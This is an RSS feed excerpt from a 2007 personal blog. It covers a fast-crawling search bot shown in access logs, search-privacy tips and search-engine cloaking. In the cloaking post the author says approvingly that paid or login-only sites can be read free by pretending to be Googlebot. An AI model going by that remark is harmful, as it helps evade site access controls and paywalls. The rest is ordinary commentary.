64.40.115.32 - - [23/Mar/2007:02:42:06 -0400] &#8220;GET / HTTP/1.0&#8243; 200 34940 &#8220;-&#8221; &#8220;Sphere Scout&amp;v4.0 (beta) - scout at sphere dot com&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:09 -0400] &#8220;GET /2007/01/12/are-you-sure-your-backup-routines-are-sufficient/ HTTP/1.0&#8243; 200 15576 &#8220;-&#8221; &#8220;Sphe&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:12 -0400] &#8220;GET /2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/ HTTP/1.0&#8243; 200 15177 &#8220;&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:14 -0400] &#8220;GET /2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/ HTTP/1.0&#8243; 200&#8243;<br />
64.40.115.32 - - [23/Mar/2007:02:42:17 -0400] &#8220;GET /2007/02/09/yet-another-creative-google-clone-spammed HTTP/1.0&#8243; 200 17297 &#8220;-&#8221; &#8220;Sphere Scout&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:19 -0400] &#8220;GET /2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for HTTP/1.0&#8243; 200 &#8220;<br />
64.40.115.32 - - [23/Mar/2007:02:42:21 -0400] &#8220;GET /2007/03/22/vigilant-a-pretty-cool-word HTTP/1.0&#8243; 200 12409 &#8220;-&#8221; &#8220;Sphere Scout&amp;v4.0 (beta) -&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:23 -0400] &#8220;GET /2006/10/11/the-enormous-power-of-plain-text-e-mail-security/ HTTP/1.0&#8243; 200 14138 &#8220;-&#8221; &#8220;Sphe&#8221;<br />
64.40.115.32 - - [23/Mar/2007:02:42:25 -0400] &#8220;GET /2007/03/22/vigilant-a-pretty-cool-word/ HTTP/1.0&#8243; 200 12409 &#8220;-&#8221; &#8220;Sphere Scout&amp;v4.0 (beta) &#8220;</p></blockquote>
<p>There is nothing wrong with crawling the web. Every search-engine has to. I started using <a href="http://www.google.com/intl/xx-hacker/">Google</a> as my #1 search engine many years ago, and I still do for two reasons:</p>
<ol>
<li>I <em>always</em> find exactly what I&#8217;m looking for (this may have something do to with me knowing how to use it&#8217;s more advanced functions)</li>
<li>It&#8217;s <em>fast</em>. Result 1-10 of  3830000 in 0.05 seconds? It&#8217;s hard to make a <em>static web page</em> load that fast.</li>
</ol>
<p>But some of their actions the latest years are at best very questionable, so it makes me happy to see that other search-engines are at least <em>trying</em> to give them competition. Like the blog-search-engine <a href="http://www.sphere.com/">Sphere</a>. <strong>But <em>hammering a page every 2 seconds?</em></strong></p>
<p><img src="http://xiando.livelyblog.com/files/2007/03/outrage.jpg" alt="outrage.jpg" /></p>
<p>If <em>every</em> new &amp; supposedly &#8220;next big thing&#8221; search-engine did that then it&#8217;d kill the web and that would be the end of it. That&#8217;s probably an overstatement, but still: Most web crawlers <em>don&#8217;t rush</em>. They download a page, wait a while, and then download another page. They usually take their time. This prevents a single bot, or a handfull of bots who happen to hit the same site, from putting noticable load on a webserver. But those running &#8220;Spere Scout&#8221; don&#8217;t get that, they want all content and they want it <em>now.</em></p>
<h2>What&#8217;s Sphere, anyway?</h2>
<p>It&#8217;s a <em>blog-search-engine</em>. A pretty bad one at that.</p>
<p><em><strong>Speed? </strong></em>Sphere is so slow it&#8217;s redicilous. It really is very hard to make a search-engine come close to Google&#8217;s speed, but Sphere is just&#8230; way too slow.<br />
<em></em></p>
<p><em><strong>Results? </strong></em>I tried a search for &#8220;<a href="http://www.sphere.com/search?q=911+inside+job">911 inside job</a>&#8221; and it only managed to find <em>43</em> links. Technorati, another way too slow blog-only searchengine, has page by page by page with results for the term &#8220;<a href="http://www.technorati.com/search/911+inside+job">911 inside job</a>&#8220;. It doesn&#8217;t say how many, you have to click next and it <em>requres referrer</em> when using &amp;start=200 etc, but from I bothered to check (without changing start=200 using a fake referrer field, which I briefly considered) it&#8217;s got thousands of results of that term. Google, as always, p0wnes them both with it&#8217;s incredible &#8220;<em>about 40,850 for <a href="http://blogsearch.google.com/blogsearch?hl=en&amp;q=911+inside+job">911 inside job</a>. (<strong>0.76</strong> seconds)</em>&#8220;.</p>
<p>They&#8217;ve also got a whole lot of &#8220;<em><strong>Tools</strong></em>&#8221; such as browser extentions and widgets who they encurage bloggers to install on their sites. I read their &#8220;<a href="http://www.sphere.com/tools">sphere it, tools and tips</a>&#8221; page and  after carefull consideration for about 0.9 seconds found that their most advanced browser extention is a searchplugin which does the job Google&#8217;s <em>related: </em>queries do, and their widgets - who show &#8220;post-related search results&#8221; looked like a more annoying version of Google Adsense - only <em>without</em> payment.</p>
<p>I found that the &#8220;Social bookmarks&#8221; widget I use - which I plan on rewriting, btw - has Sphere in it (it has like 60 sites you can choose between) - so I&#8217;m going to check if having the button has any effect on their crawling behaviour the next few weeks. Will it visit more frequently, perhaps? If it does then I may actually remove the button and <em>warn other people about having it</em> since a page pr. <em>2 seconds</em> is just <em>totally unacceptiable crawler behaviour.</em></p>
<p>In bullet summary:</p>
<ul>
<li>Sphere really should consider increasing their bots crawl-delay from 2 seconds, and</li>
<li>Their blogsearchengine is redicilous, it&#8217;s slow, it finds nothing and it wouldn&#8217;t even pass as decient back in 1998.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/03/23/sphere-blog-search-crawling-9-pages-in-16-seconds/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Vigilant, a pretty cool word</title>
		<link>http://xiando.livelyblog.com/2007/03/22/vigilant-a-pretty-cool-word/</link>
		<comments>http://xiando.livelyblog.com/2007/03/22/vigilant-a-pretty-cool-word/#comments</comments>
		<pubDate>Thu, 22 Mar 2007 14:55:38 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Living is Learning]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/03/22/vigilant-a-pretty-cool-word/</guid>
		<description><![CDATA[I learned a new word today: Vigilant. Someone told me I should be that. And I had to look it up to figure out what it means.
According to the first entry on Google&#8217;s define. vigilant it means:
argus-eyed: carefully observant or attentive; on the lookout for possible danger; &#8220;a policy of open-eyed awareness&#8221;; &#8220;the vigilant eye [...]]]></description>
			<content:encoded><![CDATA[<p>I learned a new word today: <strong>Vigilant</strong>. Someone told me I should be that. And I had to look it up to figure out what it means.</p>
<p>According to the first entry on Google&#8217;s <strong>define. vigilant</strong> it means:</p>
<blockquote><p>argus-eyed: carefully observant or attentive; on the lookout for possible danger; &#8220;a policy of open-eyed awareness&#8221;; &#8220;the vigilant eye of the town watch&#8221;; &#8220;there was a watchful dignity in the room&#8221;; &#8220;a watchful parent with a toddler in tow&#8221;</p></blockquote>
<p>So I guess the nice guy who told me to be that is entirely correct.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/03/22/vigilant-a-pretty-cool-word/feed/</wfw:commentRss>
		</item>
		<item>
		<title>You&#8217;d be shocked and amazed if you knew what they&#8217;re searching for..</title>
		<link>http://xiando.livelyblog.com/2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/</link>
		<comments>http://xiando.livelyblog.com/2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/#comments</comments>
		<pubDate>Mon, 12 Mar 2007 19:42:04 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Internet]]></category>

		<category><![CDATA[Search Engines]]></category>

		<guid isPermaLink="false">https://xiando.livelyblog.com/2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/</guid>
		<description><![CDATA[I run one of the many YaCy P2P search portals out there. YaCy is a distributed P2P search-engine, if you run a node then you can search using the global index of all the nodes. Most people run their own node on their own desktop&#8217;s and don&#8217;t make it publicly available, I run a public [...]]]></description>
			<content:encoded><![CDATA[<p>I run one of the many YaCy P2P search portals out there. YaCy is a distributed P2P search-engine, if you run a node then you can search using the <em>global index of all the nodes</em>. Most people run their own node on their own desktop&#8217;s and don&#8217;t make it publicly available, I run a public search service which allows anyone to use the YaCy network.</p>
<p>YaCy has a nice &#8220;feature&#8221; called <em>Search Statistics</em>. It gives you a nice list of the latest search keywords - and <em>the hosts used</em> to search. This makes it <em>very easy</em> to follow the same user&#8217;s searches for many searches in a row. It doesn&#8217;t use cookies, which makes tracking over time impossible, but that <em>is</em> something <em>most search engines do</em>.</p>
<p>Regardless. Only seeing even <em>one</em> or <em>three searches</em> in a row at <a href="https://yacysearch.com/">YacySearch</a> actually gives <em>quite a lot of information</em> about the person doing the search. And it also may tell you <em>way to much</em>, some of the strings some people search for are just.. sick. Or very strange.</p>
<p>I would actually prefer to turn this search-logging &#8220;feature&#8221; <em>off</em> and <em>not be able to view it at all</em>, because those few times I look at the &#8220;<em>What are people searching for today?</em>&#8220;-list I almost always get.. kind of upset at just how .. how do I put it.. sick? some people are. But it does give some interesting information, too, like if there has been some story in the mainstream press about some celeberty then suddenly everybody&#8217;s searching for that celeb&#8217;s name..</p>
<p>Anyway. Here&#8217;s a word of advice for you all about searching on the Internet:</p>
<p>1) Clear your cookies every time you close your browser (Firefox, and others, can be configured to do this automatically.</p>
<p>2) Use scrapers like <a href="http://www.scroogle.org/">Scroogle</a> to search Yahoo (and Google).</p>
<p>3) Preferrably, use a anonymity system like <a href="http://tor.eff.org/">Tor</a> to browse the Internet.</p>
<p>4) Spread your searches between different search-engines. If MSN knows your last 100 searches then they probably know a whole lot about you. You&#8217;re better off doing 1 search at MSN, one search at Google, one search at Yahoo, and so on. This means that none of them get a <em>complete history</em> of your searches, and it&#8217;s <em>way</em> simpler to see what you&#8217;re up to when you&#8217;ve got 10 search-requests in a row or something like that&#8230;</p>
<p>5) Some browsers can give you &#8220;suggusted keywords&#8221; when you type in the search-box. <em>Turn this off</em>. It reports <em>everything you type</em> in the box back to a search-engine, even if you don&#8217;t actually search for anything. Worst case: You accidentially mispaste your computer password into the box, now it&#8217;s broadcasted accross the Internet to a search-engine&#8230;</p>
<p><strong><em>Happy searching. </em></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Creative SEO: Who&#8217;s there? Google? Here&#8217;s a page, just for you!</title>
		<link>http://xiando.livelyblog.com/2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/</link>
		<comments>http://xiando.livelyblog.com/2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/#comments</comments>
		<pubDate>Wed, 21 Feb 2007 19:36:20 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Computer technology]]></category>

		<category><![CDATA[Internet]]></category>

		<category><![CDATA[Marketing]]></category>

		<category><![CDATA[Search Engines]]></category>

		<guid isPermaLink="false">https://xiando.livelyblog.com/2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/</guid>
		<description><![CDATA[It&#8217;s been.. uhm.. &#8220;rumored&#8221; that some sites who require you to pay and login to read their content threat web-crowlers differently and allow them to crawl &#8220;restricted&#8221; content. Which is nice, since all you have to do to access such sites without paying is to say you&#8217;re Google.
After pretending to be Google a few days [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been.. uhm.. &#8220;rumored&#8221; that some sites who require you to pay and login to read their content threat web-crowlers differently and allow them to crawl &#8220;restricted&#8221; content. Which is nice, since all you have to do to access such sites without paying is to <em>say</em> you&#8217;re Google.</p>
<p>After pretending to be Google a few days I&#8217;ve noticed something. <em>Many</em> websites seem to give a different page depending on who visits. For example, this is the front page at&nbsp;<a href="http://www.bluecoat.com" title="http://www.bluecoat. " target="_blank">www.bluecoat.com</a>:</p>
<p><a href="https://xiando.livelyblog.com/files/2007/02/bluecoat1.jpg" title="bluecoat1.jpg"><img src="https://xiando.livelyblog.com/files/2007/02/bluecoat1.jpg" alt="bluecoat1.jpg" width="500" /></a></p>
<p>Doesn&#8217;t look very fancy, does it? That is because they serve Google (and anyone/thing who pretends to be Google) a completely different page.</p>
<p>Their website actually looks like this - in most browsers:</p>
<p><a href="https://xiando.livelyblog.com/files/2007/02/bluecoat2.jpg" title="bluecoat2.jpg"><img src="https://xiando.livelyblog.com/files/2007/02/bluecoat2.jpg" alt="bluecoat2.jpg" width="500" /></a></p>
<p>This is what&#8217;s called doing <strong><em>black-hat</em></strong> &#8220;search engine optimization&#8221;.</p>
<p>Except for one little detail. The problem with all kinds of &#8220;dirty trick&#8221; black-hat SEO is that it <em>doesn&#8217;t work.</em></p>
<p>And it specially doesn&#8217;t work with Google. Se, here&#8217;s a little <em>dirty secret </em>about <em>GoogleBot</em>: It sometimes <em>lies</em> about who&#8217;s there! It will fetch the / using the normal User-Agent, wait a while, and re-crawl the root page / using a (outdated beta-version of a Linux-only) web browser  string.</p>
<p>I don&#8217;t actually know what Google (or more correctly, their bot..) thinks of websites who give them a different page. But I do not think their bot likes that kind of SEO. And as mentioned, it&#8217;s not like you&#8217;re fooling anyone by trying to give search-engines a different page, <em>most of them</em> now check at least 1 page on your site using a &#8220;fake&#8221; (as in not their own) User-Agent string.</p>
<p>But <em>I actually like getting a simpler &#8220;SEO&#8221; page</em>. It&#8217;s much simpler to find what you&#8217;re looking for using a &#8220;Web 0.1&#8243; plain text link-list - in most cases&#8230;</p>
<p>Just one more little detail regarding SEO: It <em>does not work. Forget about the SE part.</em> Just <em>optimize</em> your sites for <em>human visitors</em>. If they like it then <em>real people</em> who like your site will link to your site and pages on your site, and that&#8217;s the only kind of SEO which actuall works. Period.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
